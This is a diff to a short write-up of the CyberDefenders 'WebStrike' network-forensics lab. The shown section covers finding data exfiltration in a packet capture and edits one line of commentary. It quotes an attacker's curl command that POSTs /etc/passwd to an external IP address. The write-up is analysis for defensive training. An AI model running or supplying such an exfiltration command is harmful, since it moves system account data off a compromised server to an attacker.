qerelhasiq/cyberdefenders/network-forensics/webstrike-lab.md

 ### Data Exfiltration Attempt
 - From earlier analysis, it was determined that outbound communication occurred over port 8080.
 To investigate potential data exfiltration, the following filter was applied: `tcp.dstport == 8080`
 - Following the associated TCP stream revealed attacker-issued commands.
 A curl POST request was observed: `curl -X POST -d /etc/passwd http://117.11.88.124:443/`
-- This indicates that the attacker attempted to exfiltrate the /etc/passwd file from the compromised server.
+- This indicates that the attacker attempted to exfiltrate the passwd file from the compromised server.

 ---